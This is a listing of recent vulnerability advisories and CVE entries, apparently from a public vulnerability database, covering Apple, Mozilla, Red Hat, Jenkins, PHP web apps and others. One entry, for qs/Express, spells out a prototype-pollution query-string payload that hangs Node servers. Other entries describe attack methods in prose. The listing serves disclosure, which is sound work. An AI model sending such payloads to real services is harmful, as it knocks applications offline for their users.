Recent vulnerabilities
| ID | Description | Publish Date | Update Date |
|---|---|---|---|
| ghsa-m5ph-8w8x-4mpc (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-jj9m-3528-27j2 (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-j8p7-m3g9-jw25 (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-929h-9mmv-9rj6 (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-8243-c3qw-cfqr (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-64fc-m8mv-x59j (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-3f92-4q6m-m3rv (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-36c4-c6rg-wqpc (github) | Rejected reason: Not used | 2025-04-29T03:30:34Z | 2025-04-29T03:30:34Z |
| ghsa-xmww-383x-h57w (github) | A type confusion issue was addressed with improved checks. This issue is fixed in macOS Sequoia 1... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-vhj2-4h8c-jc8m (github) | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-p9vx-xf7x-8hp9 (github) | An authentication issue was addressed with improved state management. This issue is fixed in macO... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-j8hf-p5v4-xpj9 (github) | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-fj6q-h8w7-mx3g (github) | An integer overflow was addressed with improved input validation. This issue is fixed in macOS Se... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-86pf-577r-267c (github) | A null pointer dereference was addressed with improved input validation. This issue is fixed in i... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-7wfr-865w-3mvg (github) | A use-after-free issue was addressed with improved memory management. This issue is fixed in macO... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-72pc-mw67-6f3f (github) | An access issue was addressed with improved access restrictions. This issue is fixed in macOS Seq... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-5jgj-vxr6-w56j (github) | This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sequoia 15... | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-363q-mrhx-5q4w (github) | Rejected reason: Not used | 2025-04-29T03:30:33Z | 2025-04-29T03:30:33Z |
| ghsa-pchj-w8gf-xx64 (github) | Rejected reason: Not used | 2025-04-29T03:30:32Z | 2025-04-29T03:30:32Z |
| ghsa-9wr5-868p-4jmw (github) | A vulnerability was found in PHPGurukul Rail Pass Management System 1.0. It has been rated as cri... | 2025-04-29T00:30:28Z | 2025-04-29T00:30:28Z |
| ghsa-w2gx-jrw9-w3hf (github) | A vulnerability was found in code-projects Train Ticket Reservation System 1.0. It has been decla... | 2025-04-28T21:30:44Z | 2025-04-28T21:30:44Z |
| ghsa-fq9c-6qvw-x7wv (github) | A vulnerability was found in code-projects ATM Banking 1.0. It has been classified as critical. A... | 2025-04-28T21:30:44Z | 2025-04-28T21:30:44Z |
| ghsa-w7mr-p347-2rxr (github) | When a Web User without Create permission on subfolders attempts to upload a file to a non-existe... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-rwf8-w7mh-r554 (github) | An issue in phpgurukul Online Banquet Booking System V1.2 allows an attacker to execute arbitrary... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-p9x8-9gx8-46v6 (github) | A vulnerability classified as critical was found in projectworlds Online Examination System 1.0. ... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-mwxx-fm83-xr9c (github) | A vulnerability classified as critical has been found in PHPGurukul Nipah Virus Testing Managemen... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-m6rq-x2h2-222p (github) | Missing input validation in certain features of the Web Client of Fortra's GoAnywhere prior to ve... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-hfrv-9m27-mwhj (github) | A vulnerability was found in 201206030 Novel 3.5.0 and classified as critical. This issue affects... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-fqqj-qgxm-vg3x (github) | GFI MailEssentials prior to version 21.8 is vulnerable to a .NET deserialization issue. A remote ... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ghsa-f4cw-p89c-v458 (github) | A critical vulnerability was found in PHPGurukul User Registration & Login and User Management Sy... | 2025-04-28T21:30:43Z | 2025-04-28T21:30:43Z |
| ID | CVSS Base Score | Description | Vendor | Product | Publish Date | Update Date |
|---|---|---|---|---|---|---|
| cve-2025-2893 (NVD) | Gutenverse <= 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via countdown Block |
jegstudio |
Gutenverse – Ultimate Block Addons and Page Builder for Site Editor |
2025-04-29T06:37:46.803Z | 2025-04-29T13:32:13.407Z | |
| cve-2025-31197 (NVD) | N/A | The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, visionOS 2.4. An attacker on the local network may cause an unexpected app termination. |
Apple Apple Apple Apple Apple Apple Apple |
tvOS iOS and iPadOS iPadOS macOS visionOS macOS macOS |
2025-04-29T02:05:21.266Z | 2025-04-29T13:31:08.073Z |
| cve-2025-4063 (NVD) | code-projects Student Information Management System cancel stack-based overflow |
code-projects |
Student Information Management System |
2025-04-29T13:31:05.581Z | 2025-04-29T13:31:05.581Z | |
| cve-2025-4062 (NVD) | code-projects Theater Seat Booking System cancel stack-based overflow |
code-projects |
Theater Seat Booking System |
2025-04-29T13:31:03.930Z | 2025-04-29T13:31:03.930Z | |
| cve-2025-3891 (NVD) | CVSS-v3.1: 5.3 | Mod_auth_openidc: dos via empty post in mod_auth_openidc with oidcpreservepost enabled |
Red Hat Red Hat Red Hat |
Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 |
2025-04-29T11:56:50.808Z | 2025-04-29T13:28:56.905Z |
| cve-2025-24252 (NVD) | N/A | A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sequoia 15.4, tvOS 18.4, macOS Ventura 13.7.5, iPadOS 17.7.6, macOS Sonoma 14.7.5, iOS 18.4 and iPadOS 18.4, visionOS 2.4. An attacker on the local network may be able to corrupt process memory. |
Apple Apple Apple Apple Apple Apple Apple |
tvOS iOS and iPadOS iPadOS macOS visionOS macOS macOS |
2025-04-29T02:05:22.184Z | 2025-04-29T13:26:46.327Z |
| cve-2025-3452 (NVD) | SecuPress Free <= 2.3.9 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation |
secupress |
SecuPress Free — WordPress Security |
2025-04-29T08:21:44.044Z | 2025-04-29T13:26:15.223Z | |
| cve-2025-30194 (NVD) | CVSS-v3.1: 7.5 | Denial of service via crafted DoH exchange |
PowerDNS |
DNSdist |
2025-04-29T11:25:47.141Z | 2025-04-29T13:25:09.226Z |
| cve-2025-4059 (NVD) | code-projects Prison Management System Prison_Mgmt_Sys addrecord stack-based overflow |
code-projects |
Prison Management System |
2025-04-29T12:00:05.762Z | 2025-04-29T13:25:00.482Z | |
| cve-2025-4060 (NVD) | PHPGurukul Notice Board System category.php sql injection |
PHPGurukul |
Notice Board System |
2025-04-29T12:31:05.760Z | 2025-04-29T13:21:34.828Z | |
| cve-2025-1194 (NVD) | Regular Expression Denial of Service (ReDoS) in huggingface/transformers |
huggingface |
huggingface/transformers |
2025-04-29T11:30:38.810Z | 2025-04-29T13:21:13.446Z | |
| cve-2025-4058 (NVD) | Projectworlds Online Examination System Bloodgroop_process.php sql injection |
Projectworlds |
Online Examination System |
2025-04-29T11:31:03.566Z | 2025-04-29T13:20:17.241Z | |
| cve-2025-3929 (NVD) | CVSS-v4.0: 5.3 | Stored XSS vulnerability in MDaemon Email Server |
MDaemon |
Email Server |
2025-04-29T11:36:33.507Z | 2025-04-29T13:19:29.916Z |
| cve-2025-4035 (NVD) | CVSS-v3.1: 4.3 | Libsoup: cookie domain validation bypass via uppercase characters in libsoup |
Red Hat Red Hat Red Hat Red Hat |
Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 |
2025-04-29T12:56:22.726Z | 2025-04-29T13:18:21.297Z |
| cve-2024-3727 (NVD) | CVSS-v3.1: 8.3 | Containers/image: digest type does not guarantee valid type |
Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat Red Hat |
OADP-1.3-RHEL-9 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.4 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Advanced Cluster Security 4.5 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 Red Hat Enterprise Linux 9 Red Hat Enterprise Linux 9 Red Hat Migration Toolkit for Containers 1.8 Red Hat OpenShift Container Platform 4.13 Red Hat OpenShift Container Platform 4.13 Red Hat OpenShift Container Platform 4.14 Red Hat OpenShift Container Platform 4.14 Red Hat OpenShift Container Platform 4.14 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.15 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.16 Red Hat OpenShift Container Platform 4.17 Red Hat OpenShift Container Platform 4.17 Red Hat OpenShift Container Platform 4.17 Red Hat OpenShift Container Platform 4.17 Red Hat OpenShift Container Platform 4.17 Red Hat OpenShift Container Platform 4.18 Red Hat OpenShift Container Platform 4.18 Red Hat OpenShift Container Platform 4.18 Red Hat OpenShift Container Platform 4.18 Red Hat OpenShift Container Platform 4.18 Red Hat OpenShift Container Platform 4.18 RHEL-9-CNV-4.15 Multicluster Engine for Kubernetes Multicluster Engine for Kubernetes Multicluster Engine for Kubernetes Multicluster Engine for Kubernetes Multicluster Engine for Kubernetes OpenShift Developer Tools and Services OpenShift Developer Tools and Services OpenShift Serverless OpenShift Serverless OpenShift Source-to-Image (S2I) Red Hat Advanced Cluster Management for Kubernetes 2 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Advanced Cluster Security 3 Red Hat Ansible Automation Platform 1.2 Red Hat Ansible Automation Platform 2 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 Red Hat Enterprise Linux 9 Red Hat Enterprise Linux 9 Red Hat OpenShift Container Platform 3.11 Red Hat OpenShift Container Platform 3.11 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform 4 Red Hat OpenShift Container Platform Assisted Installer Red Hat OpenShift Container Platform Assisted Installer Red Hat OpenShift Container Platform Assisted Installer Red Hat OpenShift Dev Spaces Red Hat Openshift Sandboxed Containers Red Hat Openshift Sandboxed Containers Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenShift Virtualization 4 Red Hat OpenStack Platform 16.2 Red Hat Quay 3 |
2024-05-09T14:57:21.327Z | 2025-04-29T13:17:40.573Z |
| cve-2025-4061 (NVD) | code-projects Clothing Store Management System add_item stack-based overflow |
code-projects |
Clothing Store Management System |
2025-04-29T13:00:06.354Z | 2025-04-29T13:17:37.126Z | |
| cve-2025-4093 (NVD) | N/A | Memory safety bug present in Firefox ESR 128.9, and Thunderbird 128.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 128.10 and Thunderbird ESR < 128.10. |
Mozilla Mozilla |
Firefox ESR Thunderbird ESR |
2025-04-29T13:13:50.917Z | 2025-04-29T13:13:50.917Z |
| cve-2025-4092 (NVD) | N/A | Memory safety bugs present in Firefox 137 and Thunderbird 137. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:49.479Z | 2025-04-29T13:13:49.479Z |
| cve-2025-4091 (NVD) | N/A | Memory safety bugs present in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird ESR < 128.10. |
Mozilla Mozilla Mozilla Mozilla |
Firefox Firefox ESR Thunderbird Thunderbird ESR |
2025-04-29T13:13:48.089Z | 2025-04-29T13:13:48.089Z |
| cve-2025-4090 (NVD) | N/A | A vulnerability existed in Firefox for Android where potentially sensitive library locations were logged via Logcat. This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:46.677Z | 2025-04-29T13:13:46.677Z |
| cve-2025-4089 (NVD) | N/A | Due to insufficient escaping of special characters in the "copy as cURL" feature, an attacker could trick a user into using this command, potentially leading to local code execution on the user's system. This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:45.152Z | 2025-04-29T13:13:45.152Z |
| cve-2025-4088 (NVD) | N/A | A security vulnerability in Firefox allowed malicious sites to use redirects to send credentialed requests to arbitrary endpoints on any site that had invoked the Storage Access API. This enabled potential Cross-Site Request Forgery attacks across origins. This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:43.684Z | 2025-04-29T13:13:43.684Z |
| cve-2025-4087 (NVD) | N/A | A vulnerability was identified in Firefox where XPath parsing could trigger undefined behavior due to missing null checks during attribute access. This could lead to out-of-bounds read access and potentially, memory corruption. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird ESR < 128.10. |
Mozilla Mozilla Mozilla Mozilla |
Firefox Firefox ESR Thunderbird Thunderbird ESR |
2025-04-29T13:13:42.302Z | 2025-04-29T13:13:42.302Z |
| cve-2025-4086 (NVD) | N/A | A specially crafted filename containing a large number of encoded newline characters could obscure the file's extension when displayed in the download dialog. *This bug only affects Firefox for Android. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:40.899Z | 2025-04-29T13:13:40.899Z |
| cve-2025-4085 (NVD) | N/A | An attacker with control over a content process could potentially leverage the privileged UITour actor to leak sensitive information or escalate privileges. This vulnerability affects Firefox < 138 and Thunderbird < 138. |
Mozilla Mozilla |
Firefox Thunderbird |
2025-04-29T13:13:39.469Z | 2025-04-29T13:13:39.469Z |
| cve-2025-4084 (NVD) | N/A | Due to insufficient escaping of the special characters in the "copy as cURL" feature, an attacker could trick a user into using this command, potentially leading to local code execution on the user's system. *This bug only affects Firefox for Windows. Other versions of Firefox are unaffected.* This vulnerability affects Firefox ESR < 128.10, Firefox ESR < 115.23, and Thunderbird ESR < 128.10. |
Mozilla Mozilla Mozilla |
Firefox ESR Firefox ESR Thunderbird ESR |
2025-04-29T13:13:38.073Z | 2025-04-29T13:13:38.073Z |
| cve-2025-4083 (NVD) | N/A | A process isolation vulnerability in Firefox stemmed from improper handling of javascript: URIs, which could allow content to execute in the top-level document's process instead of the intended frame, potentially enabling a sandbox escape. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird ESR < 128.10. |
Mozilla Mozilla Mozilla Mozilla Mozilla |
Firefox Firefox ESR Firefox ESR Thunderbird Thunderbird ESR |
2025-04-29T13:13:36.578Z | 2025-04-29T13:13:36.578Z |
| cve-2025-4082 (NVD) | N/A | Modification of specific WebGL shader attributes could trigger an out-of-bounds read, which, when chained with other vulnerabilities, could be used to escalate privileges. *This bug only affects Firefox for macOS. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird ESR < 128.10. |
Mozilla Mozilla Mozilla Mozilla Mozilla |
Firefox Firefox ESR Firefox ESR Thunderbird Thunderbird ESR |
2025-04-29T13:13:35.242Z | 2025-04-29T13:13:35.242Z |
| cve-2024-58099 (NVD) | N/A | vmxnet3: Fix packet corruption in vmxnet3_xdp_xmit_frame |
Linux Linux |
Linux Linux |
2025-04-29T11:45:30.997Z | 2025-04-29T11:45:30.997Z |
| cve-2022-44648 (NVD) | N/A | An Out-of-bounds read vulnerability in Trend Micro Apex One and Apex One as a Service could allow a local attacker to disclose sensitive information on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is similar to, but not the same as CVE-2022-44647. |
Trend Micro, Inc. |
Trend Micro Apex One |
2022-11-21T17:56:45.351Z | 2025-04-29T04:57:20.331Z |
| ID | CVSS Base Score | Description | Vendor | Product | Publish Date | Update Date |
|---|---|---|---|---|---|---|
| cve-2022-44180 (NVD) | N/A | Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:04:30.861Z |
| cve-2022-44178 (NVD) | N/A | Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:05:37.591Z |
| cve-2022-44177 (NVD) | N/A | Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:06:36.725Z |
| cve-2022-44176 (NVD) | N/A | Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function fromSetRouteStatic. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:08:41.945Z |
| cve-2022-44175 (NVD) | N/A | Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:10:00.474Z |
| cve-2022-44174 (NVD) | N/A | Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:11:13.420Z |
| cve-2022-43709 (NVD) | N/A | MyBB 1.8.31 has a SQL injection vulnerability in the Admin CP's Users module allows remote authenticated users to modify the query string via direct user input or stored search filter settings. |
n/a |
n/a |
2022-11-21T00:00:00.000Z | 2025-04-29T14:12:48.349Z |
| cve-2022-40954 (NVD) | Apache Airflow Spark Provider RCE that bypass restrictions to read arbitrary files |
Apache Software Foundation Apache Software Foundation |
Apache Airflow Spark Provider Apache Airflow |
2022-11-22T00:00:00.000Z | 2025-04-29T13:50:28.084Z | |
| cve-2022-3980 (NVD) | An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. |
Sophos |
Sophos Mobile managed on-premises |
2022-11-16T00:00:00.000Z | 2025-04-29T14:12:08.837Z | |
| cve-2022-36785 (NVD) | CVSS-v3.1: 7.5 | D-Link – G integrated Access Device4 Information Disclosure & Authorization Bypass. |
D-Link |
G integrated Access Device4 |
2022-11-17T22:27:55.842Z | 2025-04-29T13:43:47.629Z |
| cve-2022-24999 (NVD) | N/A | qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable). |
n/a |
n/a |
2022-11-26T00:00:00.000Z | 2025-04-29T13:56:42.673Z |
| cve-2022-24190 (NVD) | N/A | The /device/acceptBind end-point for Ourphoto App version 1.4.1 does not require authentication or authorization. The user_token header is not implemented or present on this end-point. An attacker can send a request to bind their account to any users picture frame, then send a POST request to accept their own bind request, without the end-users approval or interaction. |
n/a |
n/a |
2022-11-28T00:00:00.000Z | 2025-04-29T13:35:11.846Z |
| cve-2022-24189 (NVD) | N/A | The user_token authorization header on the Ourphoto App version 1.4.1 /apiv1/* end-points is not implemented properly. Removing the value causes all requests to succeed, bypassing authorization and session management. The impact of this vulnerability allows an attacker POST api calls with other users unique identifiers and enumerate information of all other end-users. |
n/a |
n/a |
2022-11-28T00:00:00.000Z | 2025-04-29T13:36:14.016Z |
| cve-2022-24188 (NVD) | N/A | The /device/signin end-point for the Ourphoto App version 1.4.1 discloses clear-text password information for functionality within the picture frame devices. The deviceVideoCallPassword and mqttPassword are returned in clear-text. The lack of sessions management and presence of insecure direct object references allows to return password information for other end-users devices. Many of the picture frame devices offer video calling, and it is likely this information can be used to abuse that functionality. |
n/a |
n/a |
2022-11-28T00:00:00.000Z | 2025-04-29T13:37:33.862Z |
| cve-2022-24187 (NVD) | N/A | The user_id and device_id on the Ourphoto App version 1.4.1 /device/* end-points both suffer from insecure direct object reference vulnerabilities. Other end-users user_id and device_id values can be enumerated by incrementing or decrementing id numbers. The impact of this vulnerability allows an attacker to discover sensitive information such as end-user email addresses, and their unique frame_token value of all other Ourphoto App end-users. |
n/a |
n/a |
2022-11-28T00:00:00.000Z | 2025-04-29T13:39:33.899Z |
| cve-2025-40014 (NVD) | N/A | objtool, spi: amd: Fix out-of-bounds stack access in amd_set_spi_freq() |
Linux Linux |
Linux Linux |
2025-04-18T07:01:40.151Z | 2025-04-18T07:01:40.151Z |
| cve-2025-31720 (NVD) | N/A | A missing permission check in Jenkins 2.503 and earlier, LTS 2.492.2 and earlier allows attackers with Computer/Create permission but without Computer/Extended Read permission to copy an agent, gaining access to its configuration. |
Jenkins Project |
Jenkins |
2025-04-02T14:59:49.570Z | 2025-04-02T16:49:21.599Z |
| cve-2025-31721 (NVD) | N/A | A missing permission check in Jenkins 2.503 and earlier, LTS 2.492.2 and earlier allows attackers with Computer/Create permission but without Computer/Configure permission to copy an agent, gaining access to encrypted secrets in its configuration. |
Jenkins Project |
Jenkins |
2025-04-02T14:59:50.144Z | 2025-04-02T16:51:08.706Z |
| cve-2025-31722 (NVD) | N/A | In Jenkins Templating Engine Plugin 2.5.3 and earlier, libraries defined in folders are not subject to sandbox protection, allowing attackers with Item/Configure permission to execute arbitrary code in the context of the Jenkins controller JVM. |
Jenkins Project |
Jenkins Templating Engine Plugin |
2025-04-02T14:59:50.726Z | 2025-04-04T03:55:28.415Z |
| cve-2025-46421 (NVD) | CVSS-v3.1: 6.8 | Libsoup: information disclosure may leads libsoup client sends authorization header to a different host when being redirected by a server |
Red Hat Red Hat Red Hat Red Hat |
Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 |
2025-04-24T13:01:24.589Z | 2025-04-24T13:13:43.866Z |
| cve-2025-46420 (NVD) | CVSS-v3.1: 6.5 | Libsoup: memory leak on soup_header_parse_quality_list() via soup-headers.c |
Red Hat Red Hat Red Hat Red Hat |
Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Enterprise Linux 9 |
2025-04-24T12:58:01.121Z | 2025-04-24T13:15:16.871Z |
| cve-2025-46419 (NVD) | Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet. |
Westermo |
WeOS |
2025-04-24T00:00:00.000Z | 2025-04-24T14:50:34.633Z | |
| cve-2025-46417 (NVD) | The unsafe globals in Picklescan before 0.0.25 do not include ssl. Consequently, ssl.get_server_certificate can exfiltrate data via DNS after deserialization. |
Picklescan |
Picklescan |
2025-04-24T00:00:00.000Z | 2025-04-24T14:51:19.232Z | |
| cve-2025-46400 (NVD) | CVSS-v3.1: 7.1 | fig2dev segmentation fault in read_arcobject |
xfig |
fig2dev |
2025-04-23T20:55:17.239Z | 2025-04-24T13:07:22.733Z |
